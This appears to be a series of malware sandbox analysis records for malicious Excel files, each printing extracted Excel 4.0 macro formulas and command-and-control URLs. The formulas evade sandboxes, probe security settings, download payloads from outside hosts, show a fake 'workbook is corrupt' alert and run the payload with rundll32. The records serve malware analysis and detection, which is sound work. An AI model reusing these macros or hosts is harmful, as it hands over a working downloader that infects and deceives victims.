{"version":"0.2","sample":{"sample":"","kind":"file","target":"73df974aed5a9a982d1d5dc6d219ceb18a90b85cd08446383f45d0cb7d3b405d"},"analysis":{"reported":"2020-04-09T16:17:04Z","score":10},"files":[{"filename":"73df974aed5a9a982d1d5dc6d219ceb18a90b85cd08446383f45d0cb7d3b405d","filesize":206336,"md5":"9fc157538f444fa51c2f7f8b30b9c968","sha1":"17a45017c1696c95792b606d59d1c51ba82a9367","sha256":"73df974aed5a9a982d1d5dc6d219ceb18a90b85cd08446383f45d0cb7d3b405d","sha512":"8e432d341a4a5141af7130e0220c66211755bfcf9898a59b9ce2db10b34e2a4bafe3d1edc757eb5c10f5f766c5e338821f73c7fa0b25918ca47b7a2592b9fc2b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"73df974aed5a9a982d1d5dc6d219ceb18a90b85cd08446383f45d0cb7d3b405d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"aLAxWnixTW\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"73e14459eb3111d65aa796cfa370b160c88051369e9bb9430136aab650487220"},"analysis":{"reported":"2020-04-09T16:17:04Z","score":10},"files":[{"filename":"73e14459eb3111d65aa796cfa370b160c88051369e9bb9430136aab650487220","filesize":170496,"md5":"2912be45b47b59e60132235325907890","sha1":"75e90c5f7284073a8dd514d524bc9a21ea5acb0f","sha256":"73e14459eb3111d65aa796cfa370b160c88051369e9bb9430136aab650487220","sha512":"a8b5c1fb61bb8c796ecb3d2bcec64abf2e7cb65715a88cc09e331763c203c29be650da57350bf35f635083e9a08627b575ba9164bb00d4546a3211bbe70072f6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"73e14459eb3111d65aa796cfa370b160c88051369e9bb9430136aab650487220.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"waL7hbp8HG\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"73e951c0b7e384cc1c7e72faeaa6f7cb5595d5d3d478c9b6ff45c4becadbe9ad"},"analysis":{"reported":"2020-04-09T16:17:04Z","score":10},"files":[{"filename":"73e951c0b7e384cc1c7e72faeaa6f7cb5595d5d3d478c9b6ff45c4becadbe9ad","filesize":225280,"md5":"95d4428f5d88c7710c4c6c55718b02ba","sha1":"95393af23332b48e602c3f8eb9077f104a79e26e","sha256":"73e951c0b7e384cc1c7e72faeaa6f7cb5595d5d3d478c9b6ff45c4becadbe9ad","sha512":"90b51f4db5688a3c4e4f7526e4723c5f8e6d9c93ee7968f4f281af3f6be5d7f4ec1609552cec6a0149f04c51cfd5b1c962371c547db4a75a4d2a9b88e8144d10","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"73e951c0b7e384cc1c7e72faeaa6f7cb5595d5d3d478c9b6ff45c4becadbe9ad.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Mr4Afg3W5I\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"73f8f0eafa86668d5f0e7895ec2a0e02323ea9ad25b8f0da9469ff31916ce3dd"},"analysis":{"reported":"2020-04-09T16:17:04Z","score":10},"files":[{"filename":"73f8f0eafa86668d5f0e7895ec2a0e02323ea9ad25b8f0da9469ff31916ce3dd","filesize":170496,"md5":"7a9e326d11ee69b6097dae38f9931cf1","sha1":"e8649cb394972426d36a8720d5a0b2a9c4f0135a","sha256":"73f8f0eafa86668d5f0e7895ec2a0e02323ea9ad25b8f0da9469ff31916ce3dd","sha512":"54f903c6bb32218ccbf520e707a1de4bf0b00173eaa17c755181db85e0d9f5310c6dc9dc64ae5b2b1ff7f5f572812bbd8825add08b517175f4b1584388ba3293","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"73f8f0eafa86668d5f0e7895ec2a0e02323ea9ad25b8f0da9469ff31916ce3dd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pNCwPAw4RS\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"740d8a02714619ceefac5e58ca3001c72a9f85cc2bfacd3e656f6cc9bbd5ff62"},"analysis":{"reported":"2020-04-09T16:17:04Z","score":10},"files":[{"filename":"740d8a02714619ceefac5e58ca3001c72a9f85cc2bfacd3e656f6cc9bbd5ff62","filesize":226304,"md5":"a74e45cc244a0bdb3d9df063e2478336","sha1":"1a9c1c593833d5c04fdd9a73cca39cbc8ecbd492","sha256":"740d8a02714619ceefac5e58ca3001c72a9f85cc2bfacd3e656f6cc9bbd5ff62","sha512":"894df19f9c87bceb8d9fba06996e1acff03f1bbde134f8fdb2b0b3c5fd0dba98dde31d8c5a1d8147745e9c6c0c19bb93028d55e9b8f61b33465ab2a7192d1496","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"740d8a02714619ceefac5e58ca3001c72a9f85cc2bfacd3e656f6cc9bbd5ff62.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"m207mXaJi5\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7418455d263c31db38899a4a745f65ab0a56d002b60d318c8f9e6d85f9fee198"},"analysis":{"reported":"2020-04-09T16:17:04Z","score":10},"files":[{"filename":"7418455d263c31db38899a4a745f65ab0a56d002b60d318c8f9e6d85f9fee198","filesize":167936,"md5":"c63d1b7dcf4031b76ef83a8ec6d4c89d","sha1":"c620227e5f1a73193fde10866e18fe3d55e98b13","sha256":"7418455d263c31db38899a4a745f65ab0a56d002b60d318c8f9e6d85f9fee198","sha512":"f213e9a35e47c23bd97e9a9697f7491da863f341f9f86f9bbd0420b7d4ee337d643b9ae4b77bf59d5622b49123f1cb6511af45316792b808f4cf9dce11aed8e9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7418455d263c31db38899a4a745f65ab0a56d002b60d318c8f9e6d85f9fee198.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JZ9Tz1NxFw\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"741a6ef82a20e632af3655f77fc3c02307d710636b7c24a3dc80e2a988e35165"},"analysis":{"reported":"2020-04-09T16:17:04Z","score":10},"files":[{"filename":"741a6ef82a20e632af3655f77fc3c02307d710636b7c24a3dc80e2a988e35165","filesize":167936,"md5":"1d38020a4fdaabec2795270f85cee11c","sha1":"dbadaaa02fc33ba0395bfdcf4b41ccf180c413a8","sha256":"741a6ef82a20e632af3655f77fc3c02307d710636b7c24a3dc80e2a988e35165","sha512":"0fbbb90e57af425349e61967a25d3faa478810c7a7a7490e2c8c5498495fa4b8cf9b6efc58e1ec1542576777b74070ace4ef79b78107382b55c0f8b5a62265ac","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"741a6ef82a20e632af3655f77fc3c02307d710636b7c24a3dc80e2a988e35165.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FE5EfYQJ0F\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"743ca4d1f1ffb192f7848394bb1f2d425caee6bf51e38aea0c12ce4f464e5313"},"analysis":{"reported":"2020-04-09T16:17:04Z","score":10},"files":[{"filename":"743ca4d1f1ffb192f7848394bb1f2d425caee6bf51e38aea0c12ce4f464e5313","filesize":144384,"md5":"5b42b5e87600919abe7c2dcb1d0c3b81","sha1":"83050ec2bf9913fb7fe18b589548258381b7f7bc","sha256":"743ca4d1f1ffb192f7848394bb1f2d425caee6bf51e38aea0c12ce4f464e5313","sha512":"5c61c61aacfcd23314b5f9a8fb8b5931bafec33ac98e6d8de4bba765bfb445224b96af9749b621015ae7eb096be866399b15c6d64d5ce95df7fea6883795bbff","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"743ca4d1f1ffb192f7848394bb1f2d425caee6bf51e38aea0c12ce4f464e5313.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"zciVpIlMpz\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"74481a1393170d7fe9e09e49fe10a0e156e5b85726dc9424a655f706c73f8280"},"analysis":{"reported":"2020-04-09T16:17:04Z","score":10},"files":[{"filename":"74481a1393170d7fe9e09e49fe10a0e156e5b85726dc9424a655f706c73f8280","filesize":209920,"md5":"0a3658d51c55e24663cdb307bb0da077","sha1":"7739f515ef31cc8615febfe78e75fa05db419ecf","sha256":"74481a1393170d7fe9e09e49fe10a0e156e5b85726dc9424a655f706c73f8280","sha512":"32e14cc9e54b05c57b76d9e39f0753bb6287184db89fe44b10e02aa814030a344dca9776f2d4a1e0c5a53ac198f72df4e4c8612328ff11f625f9a6a64d7b8a11","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"74481a1393170d7fe9e09e49fe10a0e156e5b85726dc9424a655f706c73f8280.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7P7iVnTbL2\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"74482cdbd7607dd34f53dca283ce44e7fbed8028bd0a0c5177fe1148e63486da"},"analysis":{"reported":"2020-04-09T16:17:04Z","score":10},"files":[{"filename":"74482cdbd7607dd34f53dca283ce44e7fbed8028bd0a0c5177fe1148e63486da","filesize":209408,"md5":"98c4a44e1442958b9993a165b1241fa2","sha1":"71215e2edea7a81573f20679ed57d0db7e0b4393","sha256":"74482cdbd7607dd34f53dca283ce44e7fbed8028bd0a0c5177fe1148e63486da","sha512":"47bf084f5cb60928922020ebcf7bd322c99569177b56ea58cfc4b7addc0043947dfdbbff4f3b8aefda3a347a113d95a28e37224f8a030075e093fcc81b2a7355","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"74482cdbd7607dd34f53dca283ce44e7fbed8028bd0a0c5177fe1148e63486da.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"aipoRITNLE\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"74652b1114adced7314c779ba7f34ce4b40636de57a7a8f90564e530d79e8ddc"},"analysis":{"reported":"2020-04-09T16:17:05Z","score":10},"files":[{"filename":"74652b1114adced7314c779ba7f34ce4b40636de57a7a8f90564e530d79e8ddc","filesize":167936,"md5":"e924e24aa56209665bb1fe20b62df076","sha1":"df0922c4fd338e3cc491cd8e12e9ed43057478a3","sha256":"74652b1114adced7314c779ba7f34ce4b40636de57a7a8f90564e530d79e8ddc","sha512":"d092626f3d441504855f9778462ed40dc79a4d85e0ec7211fd0e32a0c6f17e6f70e24e643be0cc3e6d27496098af200e1dded4721e3c93cfdd1599a83d579cd9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"74652b1114adced7314c779ba7f34ce4b40636de57a7a8f90564e530d79e8ddc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xG8YntUpxm\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"746fb64d561aef359134968b6cdcf352117741d2c72f1fe14e6a40b9855bc5d3"},"analysis":{"reported":"2020-04-09T16:17:05Z","score":10},"files":[{"filename":"746fb64d561aef359134968b6cdcf352117741d2c72f1fe14e6a40b9855bc5d3","filesize":152576,"md5":"01cfec325104f292dcecba4daa7e9943","sha1":"02972ed0422708373d030d7dca62ba45fcfc1a5f","sha256":"746fb64d561aef359134968b6cdcf352117741d2c72f1fe14e6a40b9855bc5d3","sha512":"daeb1662b0c2c940f8d0a3cd63e66dc3b9c438ebe5a6c97297059d6b06e6cd5be186c015420f6225100e514e258f85f92d85be27d063a2d5ff93417abe7d0d95","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"746fb64d561aef359134968b6cdcf352117741d2c72f1fe14e6a40b9855bc5d3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KpB5GV2TfY\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7478ffaa7fd53143b7bf03664d466055d76158699638557cdc5f6bf84241591e"},"analysis":{"reported":"2020-04-09T16:17:05Z","score":10},"files":[{"filename":"7478ffaa7fd53143b7bf03664d466055d76158699638557cdc5f6bf84241591e","filesize":145920,"md5":"6bb3936d4a508bd0e8f86363022caabd","sha1":"9b5f2a3d14b267761187e632b2c0971b2f29918a","sha256":"7478ffaa7fd53143b7bf03664d466055d76158699638557cdc5f6bf84241591e","sha512":"d4fa939b6caa4a152f3d8691745007757043bd43374cd9629af81a81ae4ab8af0ca4eeb7c842f322633833182de8c8159ac2e4c34e17569e6a9cebc9670f1d35","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7478ffaa7fd53143b7bf03664d466055d76158699638557cdc5f6bf84241591e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"FFHjfdWhS1\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"747d98bf9c819408aca25d977405ad19ec9dcab715810be2f530a43349e79fb1"},"analysis":{"reported":"2020-04-09T16:17:05Z","score":10},"files":[{"filename":"747d98bf9c819408aca25d977405ad19ec9dcab715810be2f530a43349e79fb1","filesize":207360,"md5":"3a7ea2931054638d5730ebde300bad12","sha1":"79cde73146fa83cc1f4aa23e3847678d8e4c97a4","sha256":"747d98bf9c819408aca25d977405ad19ec9dcab715810be2f530a43349e79fb1","sha512":"f9cf2fd46335a824601d0c205802268ee7f3dba51220941b3c7ef2ed8930230f6fe519a4383edf2890f9ac07ff792f6b81f0141d0008bcd8977645a7377cdd6f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"747d98bf9c819408aca25d977405ad19ec9dcab715810be2f530a43349e79fb1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-crun.php","https://narensyndicate.com/wp-crun.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-crun.php\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-crun.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"N8e8wyMShv\",TRUE)\nGOTO(R$0C$17)"}}}]}
